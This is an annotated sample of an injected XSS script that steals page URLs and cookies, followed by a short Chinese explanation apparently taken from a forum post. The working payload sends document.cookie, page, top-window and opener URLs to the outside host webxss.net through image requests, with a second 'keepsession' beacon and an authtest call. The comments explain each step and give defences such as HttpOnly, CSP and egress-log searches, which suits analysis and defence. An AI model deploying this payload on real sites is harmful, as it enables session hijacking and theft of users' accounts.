/*
 * Injected-script sample (XSS data-exfiltration beacon), annotated for analysis.
 *
 * What the line does: it builds an <img> request (new Image().src = ...) to
 * http://webxss.net//index.php?do=api&id=Q6fQWR and appends four values read
 * from the victim page as query parameters, each passed through escape():
 *   location    - document.location.href (URL of the page running the script)
 *   toplocation - top.location.href (URL of the top-level window)
 *   cookie      - document.cookie (every cookie readable by script)
 *   opener      - window.opener.location.href, or '' if there is no opener
 * Each read sits in its own try/catch that returns '' on an exception, so one
 * failing read (e.g. a cross-origin top/opener) does not stop the request.
 *
 * Defensive notes:
 *   - Cookies set with the HttpOnly attribute do not appear in document.cookie
 *     and therefore are not included in the `cookie` parameter.
 *   - A Content-Security-Policy whose img-src (or default-src) does not allow
 *     this host blocks the image request; a script-src policy that blocks the
 *     injected script prevents it from running at all.
 *   - The request is a plain-HTTP GET, so the values appear in the URL; proxy
 *     or egress logs can be searched for third-party requests carrying
 *     `cookie=` / `toplocation=` / `opener=` parameters.
 *   - The root cause is the injection point that let this script run; output
 *     encoding / sanitisation at that point is the actual fix.
 */
(function(){(new Image()).src='http://webxss.net//index.php?do=api&id=Q6fQWR&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
// Second beacon: '1'==1 is true under loose equality, so this branch always
// runs. NOTE(review): the literal '1' looks like a flag filled in by whatever
// generated this script; the generator is not visible here.
// It sends the page URL and document.cookie again, this time to the
// do=keepsession endpoint with the same id. `keep` is assigned without a
// declaration, so it becomes an implicit global on the page.
// The same mitigations apply: HttpOnly cookies are not readable here, and a
// restrictive CSP img-src blocks the request.
if('1'==1){keep=new Image();keep.src='http://webxss.net//index.php?do=keepsession&id=Q6fQWR&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
// Third request: another implicit global (`x`) used only to fire an image
// request.
x=new Image();
// Fixed URL with no page data appended: authtest.php?id=Q6fQWR&info=login.
// NOTE(review): what the server does with this request is not shown on the page.
x.src="http://webxss.net//authtest.php?id=Q6fQWR&info=login";
下面有图。我觉得直接贴代码看不清,所以专门传了一张图。
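取得你当前浏览的网站的 URL、顶级域名(代码里对应 toplocation,即 top.location.href)、浏览器 cookie、浏览器类型(上面的代码没有显式读取浏览器类型,图片请求本身会带上 User-Agent 头)。注意:设置了 HttpOnly 的 cookie 不会出现在 document.cookie 里。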
上面已经讲过了,你直接用 alert 就能看出来;然后这些值通过 escape 函数进行了编码(包装)。